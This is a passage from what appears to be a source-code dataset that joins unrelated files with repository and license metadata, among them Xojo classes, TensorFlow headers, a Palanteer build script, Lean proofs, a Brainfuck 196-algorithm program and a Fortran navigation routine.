$HOME/Desktop/Folder to /tmp recursively with verbose turned on $ cp -rv ~/Desktop/Folder /tmp # same thing $ cp ~/Desktop/Folder -r /tmp -v # enable logging to a file $ cp -rv --log=file.txt ~/Desktop/Folder /tmp # enable logging to a file using combined short options $ cp -rvl=file.txt ~/Desktop/Folder /tmp # disable verbose and copy a file named "-r" to "tmp.txt" $ cp --no-verbose -- -r tmp.txt ``` #tag EndNote #tag Note, Name = Overview `OptionParser` is the glue between `Option` classes and the command line as supplied via the `Run` event's `args()` parameter in a `ConsoleApplication` or via a call to `System.CommandLine` in a Desktop or Web application. It handles actually parsing the command line, populating the associated `Option`s and validating it as a whole. #tag EndNote #tag ComputedProperty, Flags = &h0 #tag Note Displayed after the help message generated by `OptionParser` when the help screen is shown. This can be used to provide further usage notes and to expand on options when a single line description is not sufficient. #tag EndNote #tag Getter Get return mAdditionalHelpNotes End Get #tag EndGetter #tag Setter Set mAdditionalHelpNotes = ReplaceLineEndings(value.Trim, EndOfLine) End Set #tag EndSetter AdditionalHelpNotes As String #tag EndComputedProperty #tag Property, Flags = &h0 #tag Note Typically a single line description of the application that is displayed before the application help. #tag EndNote AppDescription As String #tag EndProperty #tag Property, Flags = &h0 #tag Note Name of the application. If empty, `OptionParser` will assign the `AppName` variable to the name of the executable filename. This is displayed when user help is shown. #tag EndNote AppName As String #tag EndProperty #tag Property, Flags = &h21 Private Dict As Dictionary #tag EndProperty #tag Property, Flags = &h0 #tag Note Any non-option parameters given to the application will be appended to this array. For example: ``` $ my-app --verbose -o ./docs file.txt file2.txt file3.txt ``` In the above case, the `Extras` array will contain three strings: ``` 0 = "file.txt" 1 = "file2.txt" 2 = "file3.txt" ``` #tag EndNote Extra() As String #tag EndProperty #tag Property, Flags = &h0 #tag Note Specify the minimum number of extra items required. For example, say you are writing a copy program. One might set this value to `2`. ``` $ copy extra1 extra2 ``` See `Extra` for more information. #tag EndNote ExtrasRequired As Integer = 0 #tag EndProperty #tag ComputedProperty, Flags = &h0 #tag Note `True` when the user supplies either `-h` or `--help` on the command line. #tag EndNote #tag Getter Get Dim o As Option = OptionValue("help") If o Is Nil Then Return False // Should never happen Else Return o.WasSet End If End Get #tag EndGetter HelpRequested As Boolean #tag EndComputedProperty #tag Property, Flags = &h21 Private mAdditionalHelpNotes As String #tag EndProperty #tag Property, Flags = &h21 Private Options() As Option #tag EndProperty #tag Property, Flags = &h21 Private OriginalArgs() As String #tag EndProperty #tag Constant, Name = kIndentPrefix, Type = String, Dynamic = False, Default = \" ", Scope = Private #tag EndConstant #tag Constant, Name = kInvalidKeyValue, Type = String, Dynamic = False, Default = \"key value is invalid", Scope = Private #tag EndConstant #tag Constant, Name = kMissingKeyValue, Type = String, Dynamic = False, Default = \"key value is missing", Scope = Private #tag EndConstant #tag ViewBehavior #tag ViewProperty Name="AdditionalHelpNotes" Group="Behavior" Type="String" EditorType="MultiLineEditor" #tag EndViewProperty #tag ViewProperty Name="AppDescription" Group="Behavior" Type="String" EditorType="MultiLineEditor" #tag EndViewProperty #tag ViewProperty Name="AppName" Group="Behavior" Type="String" EditorType="MultiLineEditor" #tag EndViewProperty #tag ViewProperty Name="ExtrasRequired" Group="Behavior" InitialValue="0" Type="Integer" #tag EndViewProperty #tag ViewProperty Name="HelpRequested" Group="Behavior" Type="Boolean" #tag EndViewProperty #tag ViewProperty Name="Index" Visible=true Group="ID" InitialValue="-2147483648" Type="Integer" #tag EndViewProperty #tag ViewProperty Name="Left" Visible=true Group="Position" InitialValue="0" Type="Integer" #tag EndViewProperty #tag ViewProperty Name="Name" Visible=true Group="ID" Type="String" #tag EndViewProperty #tag ViewProperty Name="Super" Visible=true Group="ID" Type="String" #tag EndViewProperty #tag ViewProperty Name="Top" Visible=true Group="Position" InitialValue="0" Type="Integer" #tag EndViewProperty #tag EndViewBehavior End Class #tag EndClass
Xojo
5
joneisen/Kaju
Other Classes/OptionParser/OptionParser.xojo_code
[ "MIT" ]
tamanhoAtual = len(aBuffer) asize(aBuffer, tamanhoAtual + len(aCandidato)) acopy(aCandidato, aBuffer, 1, len(aCandidato), tamanhoAtual + 1) //https://pt.stackoverflow.com/q/348512/101
xBase
1
piovezan/SOpt
xBase/ADVPLConcatArray.prg
[ "MIT" ]
--TEST-- PECL Bug #6109 (Error messages not kept) --EXTENSIONS-- oci8 --FILE-- <?php require(__DIR__.'/connect.inc'); // Run Test echo "Test 1\n"; $s = oci_parse($c, 'delete from table_does_not_exist'); $r = @oci_execute($s); if ($r) { echo "whoops - table does exist\n"; } else { for ($i = 0; $i < 5; $i++) { $err = oci_error($s); echo ($i) .' -> '.$err['message'] ."\n"; } } // Cleanup oci_close($c); echo "Done\n"; ?> --EXPECTF-- Test 1 0 -> ORA-00942: %s 1 -> ORA-00942: %s 2 -> ORA-00942: %s 3 -> ORA-00942: %s 4 -> ORA-00942: %s Done
PHP
3
NathanFreeman/php-src
ext/oci8/tests/pecl_bug6109.phpt
[ "PHP-3.01" ]
#!/bin/bash set -e DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null && pwd )" cd $DIR if [ ! -d palanteer ]; then git clone https://github.com/dfeneyrou/palanteer pip install wheel sudo apt install libunwind-dev libdw-dev fi cd palanteer git pull mkdir -p build cd build cmake .. -DCMAKE_BUILD_TYPE=Release make -j$(nproc) pip install --force-reinstall python/dist/palanteer*.whl cp bin/palanteer $DIR/viewer
Shell
3
GratefulJinx77/comma
selfdrive/debug/profiling/palanteer/setup.sh
[ "MIT" ]
/* * Copyright (c) 2021, Jesse Buhagiar <jooster669@gmail.com> * Copyright (c) 2021, Stephan Unverwerth <s.unverwerth@serenityos.org> * * SPDX-License-Identifier: BSD-2-Clause */ #include "GL/gl.h" #include "GLContext.h" extern GL::GLContext* g_gl_context; void glColor3dv(GLdouble const* v) { g_gl_context->gl_color(v[0], v[1], v[2], 1.0); } void glColor3f(GLfloat r, GLfloat g, GLfloat b) { g_gl_context->gl_color(r, g, b, 1.0); } void glColor3fv(const GLfloat* v) { g_gl_context->gl_color(v[0], v[1], v[2], 1.0); } void glColor3ub(GLubyte r, GLubyte g, GLubyte b) { g_gl_context->gl_color(r / 255.0, g / 255.0, b / 255.0, 1.0); } void glColor4dv(GLdouble const* v) { g_gl_context->gl_color(v[0], v[1], v[2], v[3]); } void glColor4f(GLfloat r, GLfloat g, GLfloat b, GLfloat a) { g_gl_context->gl_color(r, g, b, a); } void glColor4fv(const GLfloat* v) { g_gl_context->gl_color(v[0], v[1], v[2], v[3]); } void glColor4ub(GLubyte r, GLubyte g, GLubyte b, GLubyte a) { g_gl_context->gl_color(r / 255.0, g / 255.0, b / 255.0, a / 255.0); } void glColor4ubv(const GLubyte* v) { g_gl_context->gl_color(v[0] / 255.0f, v[1] / 255.0f, v[2] / 255.0f, v[3] / 255.0f); }
C++
4
HerrSpace/serenity
Userland/Libraries/LibGL/GLColor.cpp
[ "BSD-2-Clause" ]
/* Copyright 2015 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #ifndef TENSORFLOW_GRAPH_EQUAL_GRAPH_DEF_H_ #define TENSORFLOW_GRAPH_EQUAL_GRAPH_DEF_H_ #include "tensorflow/core/framework/graph_def_util.h" #include "tensorflow/core/platform/protobuf.h" #include "tensorflow/core/platform/types.h" namespace tensorflow { class GraphDef; class NodeDef; struct EqualGraphDefOptions { // Should internal attributes (attribute names that start with '_') be // ignored? bool ignore_internal_attrs = true; }; // Determines if actual and expected are equal, ignoring versions and ordering // of nodes, attrs, and control inputs. If the GraphDefs are different and // diff != nullptr, *diff is set to an explanation of the difference. Note that // we use node names to match up nodes between the graphs, and so the naming of // nodes must be consistent. bool EqualGraphDef(const GraphDef& actual, const GraphDef& expected, string* diff, const EqualGraphDefOptions& options = {}); // Returns a hash of `gdef` that is consistent with EqualGraphDef. In other // words, if two graph defs compare equal according to EqualGraphDef, // GraphDefHash will return the same value for both of them when called // with the same `options` that was used in the call to EqualGraphDef. // Similarly to protobuf deterministic serialization, hash value is // guaranteed to be stable only for a given binary. In particular, one should // probably not persist the returned value. uint64 GraphDefHash(const GraphDef& gdef, const EqualGraphDefOptions& options = {}); // Determines if actual and expected are equal, ignoring: ordering of // attrs, internal attributes (if set in `options`), and control inputs. // // If the NodeDefs are different and // diff != nullptr, *diff is set to an explanation of the difference. bool EqualNodeDef(const NodeDef& actual, const NodeDef& expected, string* diff, const EqualGraphDefOptions& options = {}); // Returns a hash of `ndef` that is consistent with EqualNodeDef. In other // words, if two node defs compare equal according to EqualNodeDef, NodeDefHash // will return the same value for both of them when called with the same // `options` that was used in the call to EqualNodeDef. // Similarly to protobuf deterministic serialization, hash value is // guaranteed to be stable only for a given binary. In particular, one should // probably not persist the returned value. uint64 NodeDefHash(const NodeDef& ndef, const EqualGraphDefOptions& options = {}); // Determines if actual and expected are equal, ignoring ordering. If they're // different and diff != nullptr, *diff is set to an explanation of the // difference. bool EqualRepeatedNodeDef(const protobuf::RepeatedPtrField<NodeDef>& actual, const protobuf::RepeatedPtrField<NodeDef>& expected, string* diff, const EqualGraphDefOptions& options = {}); // Returns a hash of `ndefs` that is consistent with EqualRepeatedNodeDef. // In other words, if two ndefs compare equal according to // EqualRepeatedNodeDef, RepeatedNodeDefHash will return the same value for // both of them when called with the same `options` that was used in // the call to EqualRepeatedNodeDef. // Similarly to protobuf deterministic serialization, hash value is // guaranteed to be stable only for a given binary. In particular, one should // probably not persist the returned value. uint64 RepeatedNodeDefHash(const protobuf::RepeatedPtrField<NodeDef>& ndefs, const EqualGraphDefOptions& options = {}); #define TF_EXPECT_GRAPH_EQ(expected, actual) \ do { \ string diff; \ EXPECT_TRUE(EqualGraphDef(actual, expected, &diff)) \ << diff << "\nExpected:\n" \ << SummarizeGraphDef(expected) << "\nActual:\n" \ << SummarizeGraphDef(actual); \ } while (false) } // namespace tensorflow #endif // TENSORFLOW_GRAPH_EQUAL_GRAPH_DEF_H_
C
4
abhaikollara/tensorflow
tensorflow/core/util/equal_graph_def.h
[ "Apache-2.0" ]
#tag Class Protected Class SKReceiptRefreshRequest Inherits StoreKit.SKRequest #tag Method, Flags = &h21 Private Shared Function ClassRef() As Ptr static ref as ptr = NSClassFromString("SKReceiptRefreshRequest") return ref End Function #tag EndMethod #tag Method, Flags = &h0 Sub Constructor(properties as NSDictionary) declare function initWithReceiptProperties_ lib StoreKitLib selector "initWithReceiptProperties:" (obj_id as ptr, properties as ptr) as ptr Super.Constructor( initWithReceiptProperties_(Allocate(ClassRef), properties) ) dim del as Ptr = Initialize(Allocate(TargetClass)) if dispatch = nil then dispatch = new xojo.Core.Dictionary dispatch.Value(del) = xojo.core.WeakRef.Create(self) mDelegate = del needsExtraRelease = True End Sub #tag EndMethod #tag Method, Flags = &h21 Private Sub HandleRequestDidFail(err as Foundation.NSError) RaiseEvent RequestDidFail(err) End Sub #tag EndMethod #tag Method, Flags = &h21 Private Sub HandleRequestDidFinish() RaiseEvent RequestDidFinish End Sub #tag EndMethod #tag Method, Flags = &h21 Private Shared Sub impl_requestDidFail(pid as ptr, sel as ptr, request as ptr, err as ptr) dim w as xojo.Core.WeakRef = xojo.core.WeakRef(dispatch.Value(pid)) if w.Value <> nil Then SKReceiptRefreshRequest(w.Value).HandleRequestDidFail(new Foundation.NSError(err)) end if #Pragma unused sel #Pragma unused request End Sub #tag EndMethod #tag Method, Flags = &h21 Private Shared Sub impl_requestDidFinish(pid as ptr, sel as ptr, request as ptr) dim w as xojo.Core.WeakRef = xojo.core.WeakRef(dispatch.Value(pid)) if w.Value <> nil Then SKReceiptRefreshRequest(w.Value).HandleRequestDidFinish end if #Pragma unused sel #Pragma unused request End Sub #tag EndMethod #tag Method, Flags = &h21 Private Shared Function TargetClass() As Ptr static targetID as ptr if targetID = Nil then using UIKit dim methods() as TargetClassMethodHelper methods.Append new TargetClassMethodHelper("requestDidFinish:", AddressOf impl_requestDidFinish, "v@:@") methods.Append new TargetClassMethodHelper("request:didFailWithError:", AddressOf impl_requestDidFail, "v@:@@") targetID = BuildTargetClass("NSObject","SKReceiptRefreshRequestDel",methods) end if Return targetID End Function #tag EndMethod #tag Hook, Flags = &h0 Event RequestDidFail(err as Foundation.NSError) #tag EndHook #tag Hook, Flags = &h0 Event RequestDidFinish() #tag EndHook #tag Property, Flags = &h21 Private Shared dispatch As xojo.Core.Dictionary #tag EndProperty #tag ComputedProperty, Flags = &h0 #tag Getter Get declare function delegate_ lib StoreKitLib selector "delegate" (obj_id as ptr) as ptr Return delegate_(self) End Get #tag EndGetter #tag Setter Set declare sub delegate_ lib StoreKitLib selector "setDelegate:" (obj_id as ptr, del as ptr) delegate_(self, value) End Set #tag EndSetter mDelegate As Ptr #tag EndComputedProperty #tag ComputedProperty, Flags = &h0 #tag Getter Get declare function receiptProperties_ lib StoreKitLib selector "receiptProperties" (obj_id as ptr) as ptr Return new NSDictionary(receiptProperties_(self)) End Get #tag EndGetter receiptProperties As NSDictionary #tag EndComputedProperty #tag ViewBehavior #tag ViewProperty Name="Index" Visible=true Group="ID" InitialValue="-2147483648" Type="Integer" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Left" Visible=true Group="Position" InitialValue="0" Type="Integer" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Name" Visible=true Group="ID" InitialValue="" Type="String" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Super" Visible=true Group="ID" InitialValue="" Type="String" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Top" Visible=true Group="Position" InitialValue="0" Type="Integer" EditorType="" #tag EndViewProperty #tag EndViewBehavior End Class #tag EndClass
Xojo
4
kingj5/iOSKit
Modules/StoreKit/SKReceiptRefreshRequest.xojo_code
[ "MIT" ]
# Test Player A #set N := { 1 .. 4}; #var x[N] real >= 0; #var z real; # Objective function #maximize objective: z; # Constraints #subto a: # z+x[2]+x[3] <= 0; #subto b: # z-x[2]-x[3]+2*x[4] <= 0; #subto c: # z+x[2]-x[3]+2*x[4] <= 0; #subto d1: # x[1]+x[2]+x[3]+x[4] <= 1; #subto d2: # x[1]+x[2]+x[3]+x[4] >= 1; # Test Player B set N := { 1 .. 3 }; var x[N] real >= 0; var z real; # Objective function minimize objective: z; # Constraints subto a: z >= 0; subto b: z+x[1]-x[2]+x[3] >= 0; subto c: z+x[1]+x[2]-x[3] >= 0; subto d: z+2*x[2]+2*x[3] >= 0; subto one1: x[1]+x[2]+x[3] <= 1; subto one2: x[1]+x[2]+x[3] >= 1;
Zimpl
4
ArielMant0/ko2017
sheet11/task28/test.zpl
[ "MIT" ]
/* Copyright 2016 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #ifndef TENSORFLOW_PYTHON_LIB_CORE_NDARRAY_TENSOR_H_ #define TENSORFLOW_PYTHON_LIB_CORE_NDARRAY_TENSOR_H_ #include "tensorflow/c/c_api.h" #include "tensorflow/c/tf_status_helper.h" #include "tensorflow/core/framework/tensor.h" #include "tensorflow/python/lib/core/safe_ptr.h" namespace tensorflow { Status TF_TensorToMaybeAliasedPyArray(Safe_TF_TensorPtr tensor, PyObject** out_ndarray); Status TF_TensorToPyArray(Safe_TF_TensorPtr tensor, PyObject** out_ndarray); // Creates a tensor in 'ret' from the input `ndarray`. The returned TF_Tensor // in `ret` may have its own Python reference to `ndarray`s data. After `ret` // is destroyed, this reference must (eventually) be decremented via // ClearDecrefCache(). // `convert_string` indicates whether it has to handle tstring conversion. // Expected to be removed once tstring migration is done. ABSL_MUST_USE_RESULT Status NdarrayToTensor(TFE_Context* ctx, PyObject* ndarray, Safe_TF_TensorPtr* ret); // Creates a tensor in 'ret' from the input Ndarray. // TODO(kkb): This is an old conversion function that does not support TFRT. // Currently it's used for session, py_func, and an internal project. Migrate // them. ABSL_MUST_USE_RESULT Status NdarrayToTensor(PyObject* obj, Tensor* ret); // Creates a numpy array in 'ret' which either aliases the content of 't' or has // a copy. Status TensorToNdarray(const Tensor& t, PyObject** ret); } // namespace tensorflow #endif // TENSORFLOW_PYTHON_LIB_CORE_NDARRAY_TENSOR_H_
C
5
EricRemmerswaal/tensorflow
tensorflow/python/lib/core/ndarray_tensor.h
[ "Apache-2.0" ]
/- We use the following auxiliary type instead of (Σ α : Type, α) because the code generator produces better code for `pointed`. For `pointed`, the code generator erases the field `α`. -/ structure pointed := (α : Type) (a : α) /- The following two commands demonstrate the difference. To remove the overhead in the `sigma` case, the code generator would have to support code specialization. -/ #eval pointed.mk nat 10 #eval (⟨nat, 10⟩ : Σ α : Type, α) structure heap := (size : nat) (mem : array size pointed) structure ref (α : Type) := (idx : nat) def in_heap {α : Type} (r : ref α) (h : heap) : Prop := ∃ hlt : r.idx < h.size, (h.mem.read ⟨r.idx, hlt⟩).1 = α lemma lt_of_in_heap {α : Type} {r : ref α} {h : heap} (hin : in_heap r h) : r.idx < h.size := by cases hin; assumption lemma cast_of_in_heap {α : Type} {r : ref α} {h : heap} (hin : in_heap r h) : (h.mem.read ⟨r.idx, lt_of_in_heap hin⟩).1 = α := by cases hin; exact hin_h def mk_ref : heap → Π {α : Type}, α → ref α × heap | ⟨n, mem⟩ α v := ({idx := n}, { size := n+1, mem := mem.push_back ⟨α, v⟩ }) def read : Π (h : heap) {α : Type} (r : ref α) (prf : in_heap r h), α | ⟨n, mem⟩ α r hin := eq.rec_on (cast_of_in_heap hin) (mem.read ⟨r.idx, lt_of_in_heap hin⟩).2 def write : Π (h : heap) {α : Type} (r : ref α) (prf : in_heap r h) (a : α), heap | ⟨n, mem⟩ α r hin a := { size := n, mem := mem.write ⟨r.idx, lt_of_in_heap hin⟩ ⟨α, a⟩ } lemma in_heap_mk_ref (h : heap) {α : Type} (a : α) : in_heap (mk_ref h a).1 (mk_ref h a).2 := begin cases h, simp [mk_ref, in_heap], dsimp, have : h_size < h_size + 1, { apply nat.lt_succ_self }, existsi this, simp [array.push_back, array.read, d_array.read, *] end lemma in_heap_mk_ref_of_in_heap {α β : Type} {h : heap} {r : ref α} (b : β) : in_heap r h → in_heap r (mk_ref h b).2 := begin intro hin, have := lt_of_in_heap hin, have hlt := nat.lt_succ_of_lt this, cases h, simp [in_heap, mk_ref, *] at *, dsimp, have : r.idx ≠ h_size, { intro heq, subst heq, exact absurd this (irrefl _) }, simp [array.push_back, array.read, d_array.read, *], existsi hlt, cases hin, assumption end @[simp] lemma fin.mk_eq {n : nat} {i j : nat} (h₁ : i < n) (h₂ : j < n) (h₃ : i ≠ j) : fin.mk i h₁ ≠ fin.mk j h₂ := fin.ne_of_vne h₃ lemma in_heap_write_of_in_heap {α β : Type} {h : heap} {r₁ : ref β} {r₂ : ref α} (a : α) : ∀ (hin₁ : in_heap r₁ h) (hin₂ : in_heap r₂ h), in_heap r₁ (write h r₂ hin₂ a) := begin intros, have := lt_of_in_heap hin₁, have := lt_of_in_heap hin₂, have := cast_of_in_heap hin₁, have := cast_of_in_heap hin₂, cases h, simp [in_heap, write, *] at *, dsimp, existsi this, by_cases r₂.idx = r₁.idx, { simp [*] at * }, { simp [*] } end inductive is_extension : heap → heap → Prop | refl : ∀ h, is_extension h h | by_mk_ref (h' h : heap) {α : Type} (a : α) (he : is_extension h' h) : is_extension (mk_ref h' a).2 h | by_write (h' h : heap) {α : Type} (r : ref α) (hin : in_heap r h') (a : α) (he : is_extension h' h) : is_extension (write h' r hin a) h lemma is_extension.trans {h₁ h₂ h₃ : heap} : is_extension h₁ h₂ → is_extension h₂ h₃ → is_extension h₁ h₃ := begin intro he₁, induction he₁, { intros, assumption }, all_goals { intro he₂, constructor, apply he₁_ih, assumption } end lemma in_heap_of_is_extension_of_in_heap {α : Type} {r : ref α} {h h' : heap} : is_extension h' h → in_heap r h → in_heap r h' := begin intro he, induction he generalizing α r, { intros, assumption }, { intro hin, apply in_heap_mk_ref_of_in_heap, apply he_ih, assumption }, { intro hin, apply in_heap_write_of_in_heap, apply he_ih, assumption } end
Lean
5
JLimperg/lean
tests/lean/run/heap_mem.lean
[ "Apache-2.0" ]
# Import and Export # wtf why can I use these terminators, but not Op_Newline? # oh maybe the word parser does something with it? # TODO: Also test import 'frontend/syntax' import 'bar' as foo import 'core/util' (log, p_die, foo as bar) import 'core/util' as myutil (log as mylog) import 'one'; import 'two' #echo hi var x = 1 + 2*3; var y = a[i]
Tea
2
Schweinepriester/oil
tea/testdata/file.tea
[ "Apache-2.0" ]
<div n:foreach="$foo as $bar"> <div> {if true} {$var} {else} {$foo} {/if} </div> </div>
Latte
2
timfel/netbeans
php/php.latte/test/unit/data/testfiles/indent/testIfElseBlock.latte
[ "Apache-2.0" ]
<%= cond do %> <% Post.is_published(@changeset.data) -> %> <%= link "Unpublish", to: "#{@action}/unpublish", class: "ui red fluid basic button", method: :post, data: [confirm: "Are you sure?"] %> <% Post.is_publishable(@changeset.data) -> %> <button class="ui green fluid basic button js-publish-modal">Publish</button> <%= render("_publish_modal.html", assigns) %> <% true -> %> <button class="ui green fluid basic disabled button">Publish</button> <% end %>
HTML+EEX
4
PsOverflow/changelog.com
lib/changelog_web/templates/admin/post/_publish_buttons.html.eex
[ "MIT" ]
export default "a.js";
JavaScript
1
fourstash/webpack
test/configCases/rebuild/rebuildWithNewDependencies/a.js
[ "MIT" ]
def f() -> void begin b() end def b() -> void begin f() end
Cycript
2
matheuspb/cython
examples/cross_call.cy
[ "MIT" ]
[ The 196-algorithm implemented in brainfuck by Mats Linander. This program reads a number in the form of a string of decimal digits terminated by a unix style newline (0x10) and tries to determine if the entered number is a lychrel number. A lychrel number is a number which never yields a palindrome when iteratively added with its own reversal. The process of iteratively reversing and adding until a palindromic number is obtained, is often called the 196-algorithm. The smallest number believed to be a lychrel is 196. Hence the name of the algorithm. This program will keep reversing and adding until a palindromic numbers is obtained or it runs out of memory. Given x bytes of memory, an approximately x/5 digits long number can be calculated. Rows starting with a percent sign ('%') show what the memory is supposed to look like at that point of execution. The string ":::" means "...". ---------------------------------------------------------------------------- "THE BEER-WARE LICENSE" (Revision 42): <matslina (at) kth (dot) se> wrote this file. As long as you retain this notice you can do whatever you want with this stuff. If we meet some day, and you think this stuff is worth it, you can buy me a beer in return. Mats Linander 2004-06-15 ---------------------------------------------------------------------------- ] // Request input; print the string "enter number: " ++++++++++[->++++++++++>+++++++++++>+++<<<] >+.>.++++++.<.>--.>++.<----.+++++++.------- -.<---.+++.[-]>+++++.++[--<+>]<.[-]>>.[-]<< < // Read a string of numbers and setup memory // Let 'A' denote the first number read; 'B' the second; 'Y' the second last // and 'Z' the last // Note that the string may be of any length so it is possible that A=Y // or Z=A and there can be any number of numbers between 'B' and 'Y' +>>-> ,----------[-->++++++[-<------>]<[->+>+<<]<+>+>>>>>,----------] <<<<<<[<<<<<]>- % 1 0 0 0 A A 0 1 1 B B 0 1 1 ::: 0 1 1 Y Y 0 1 1 Z Z 0 0 0 ::: // Main loop // Loop while cell (0) is 1 <<<[ // Move some numbers around >>>>>>>[<< [->>[>>>>>]<+<<<<[<<<<<]>>>]>>[>>>>>]<<[-<<<[<<<<<]>>>+>>[>>>>>]<<] >[-<+>]<<<<-<<<<<[<<<<<]>>>>>[-]>>>>>] % 1 0 0 0 A Z 0 0 1 B Y 0 0 1 ::: 0 0 1 Y B 0 0 1 Z A 0 0 0 ::: // Set some flags <<<<[<<<<<]<<+>>>>>>>[<+>>>>>>] % 1 1 0 0 A Z 0 1 1 B Y 0 1 1 ::: 0 1 1 Y B 0 1 1 Z A 0 0 0 ::: // for all pairs (AZ and BY etc) if they are not equal (A!=Z or B!=Y etc) clear // flag in cell (1) <+[-<< [->+>+<<]<[->+>-<<]>[-<+>]>>[-<<+>>]<[[-]<<<[<<<<<]<<[-]>>>>>>[>>>>>]<] <<<<] % 1 0/1 0 0 A Z 0 0 1 B Y 0 0 1 ::: 0 0 1 Y B 0 0 1 Z A 0 0 0 ::: // The flag in cell (1) is set if and only if the number is palindromic // If it is we clear the flag in cell (0) and the main loop will end <[-<->]< % 1/0 0 0 0 A Z 0 0 1 B Y 0 0 1 ::: 0 0 1 Y B 0 0 1 Z A 0 0 0 ::: // If number is not palindromic we will do some addition [ // First output some information on where we are // Print the string "AB:::YZ (plus) ZY:::BA = " >>>>>>>>[<<++++++++[-<++++++>]<.>>>>>>>>]++++++++[-<+++++<++++<++++++>>>]<<<.> .>+++.<.<.>>+++++[-<<->>]<[-]<<<[<<<.>++++++++[-<------>]<<<]++++++++++ [-<+++<++++++>>]<++.<+.[-]>.[-] // Go through all pairs (including the last one) // Let 'G' and 'H' represent the pair of numbers we are currently working // with in the loop below >>>>>>[>>>>>]+[<<<<<]>>>>>[ % ::: G H 0 0 1 ::: // Add them and check if the sum is larger than 9 <<<[-<+>] >+<<[>>-<<[->+<]]>[-<+>]>[>>-<<-]<+++++++++ [>>+<<-<-[>>>-<<<[->>+<<]]>>[-<<+>>]>[->[-]<]<<] % ::: G(plus)H(minus)9 0 0 0 1/0 ::: // The rightmost cell in the list above is 1 iff the sum was larger than 9 // If it was we add 1 to the next pair of numbers // If it was not we restore the sum <->>>+>[-<->>+<]+<[-<<<++++++++++>>>] % ::: G(plus)H 0 0 0 1 ::: // Do the next pair >>>>>>] // After adding we prepare the sum for next iteration in the main loop // and print the sum followed by newline <<<<<[-]>[-<+>>+<]>[-<+>]<<<<<<<[<<<<<]>>>>>[>>>>>]<<<<< [>[->+>+>+<<<]>>[-<<+>>]++++++++[->++++++<]>.[-]<<<<<<<<<] >[->+>+>+<<<]>>[-<<+>>]++++++++[->++++++<]>.[-] >[>>>>>]<<<<<[<+<<<<]<<< +++++++++.--------- % 1 0 0 0 Z' Z' 0 1 1 Y' Y' 0 1 1 ::: 0 1 1 B' B' 0 1 1 A' A' 0 0 0 ::: // Where the A'B' ::: Y'Z' = AB ::: YZ (plus) ZY ::: BA // Go back to the main loop >+<-] >[-<+>]< ] // We've got a palindrome and have left the main loop // Print "Palindrome: A'B':::Y'Z'" % 1/0 0 0 0 A Z 0 0 1 B Y 0 0 1 ::: 0 0 1 Y B 0 0 1 Z A 0 0 0 ::: ++++++++++[->++++++++>+++++++++++>++++++<<<]>. <++++[->++++<]>+.>--.---.+++++.<+++.>++++.---. --.<+.>>--.++[--<<<+>>>]<<<++.>>>+[>>>++++++++ [-<++++++>]<.>>>]++++++++++.
Brainfuck
3
RubenNL/brainheck
examples/196-commented.bf
[ "Apache-2.0" ]
C Copyright(c) 1998, Space Science and Engineering Center, UW-Madison C Refer to "McIDAS Software Acquisition and Distribution Policies" C in the file mcidas/data/license.txt C *** $Id: nvxrect.dlm,v 1.2 2001/11/06 20:46:30 daves Exp $ *** C ************************************************************************ C * NVXINI(IFUNC,IPARMS) -- Initializes this modules Nav routine data C * IFUNC -- ??? C * IPARMS -- array of Navblock entries as follows C * Projection : RECT C * WORD 1 -- 4 character projection type RECT MERC LAMB etc.. C * 2 -- Image Row Number of the Center of the image C * 3 -- Latitude(degrees)*10000 of Image Row (2) C * 4 -- Image Column Number of the Center of the image C * 5 -- Longitude *10000 of 4 C * 6 -- Lat(degrees per line)*10000 C * 7 -- Lon(degrees per element)*10000 C * 8 -- radius of the planet in meters C * 9 -- eccentricity of the planet * 1000000 C * 10 -- coordinate type >=0 panetodetic <0 panetocentric C * 11 -- longitude convention >=0 west positive <0 west neg. C * 12 -- LAT power of 10 -- if 0 leave at 4 else this power C * 13 -- LON power of 10 -- if 0 leave at 4 else this power C * 14 -- Degress_per_line power C * 15 -- Degrees_per_element power C * 16 -- Degrees_radian power C * 17 -- Degrees_eccentricity power C * ** -- next for added to IMGREMAP but not currently used anyway C * 21 -- ecor -- element number of upper left hand corner C * 22 -- lcor -- line number of upper left hand corner C * 23 -- esize -- size in elements of coverage (width) C * 24 -- lsize -- size in lines of coverage (height) C * C ************************************************************************* FUNCTION NVXINI(IFUNC,IPARMS) DIMENSION IPARMS(*) REAL*8 DRAD,DECC INTEGER IPOWLAT INTEGER IPOWLON INTEGER IPOWDLIN ! Degrees Per Line Power INTEGER IPOWDELE ! Degrees Per Element Power INTEGER IPOWRAD ! Degrees Radian power INTEGER IPOWECC ! Eccentricity Power CHARACTER*4 CLIT COMMON/RCTCOM/XROW,XCOL,ZSLAT,ZSLON,ZDLAT,ZDLON,ITYPE,IWEST ! ,ULLON IF (IFUNC.EQ.1) THEN IF (IPARMS(1).NE.LIT('RECT')) GO TO 900 ITYPE=1 XROW=IPARMS(2) IPOWLAT=IPARMS(12) IF (IPOWLAT .EQ. 0) IPOWLAT=4 ! default is 10000 (10^4) ZSLAT=IPARMS(3)/10.**IPOWLAT ! REAL Latitude XCOL=IPARMS(4) IPOWLON=IPARMS(13) IF (IPOWLON .EQ. 0) IPOWLON=4 ZSLON=IPARMS(5)/10.**IPOWLON ! REAL Longitude IPOWDLIN=IPARMS(14) IF (IPOWDLIN .EQ. 0) IPOWDLIN=4 ZDLAT=IPARMS(6)/10.**IPOWDLIN ! REAL Degrees_per_line_latitude IPOWDELE=IPARMS(15) IF (IPOWDELE .EQ. 0) IPOWDELE=4 ZDLON=IPARMS(7)/10.**IPOWDELE ! REAL Degrees_per_line_longitude 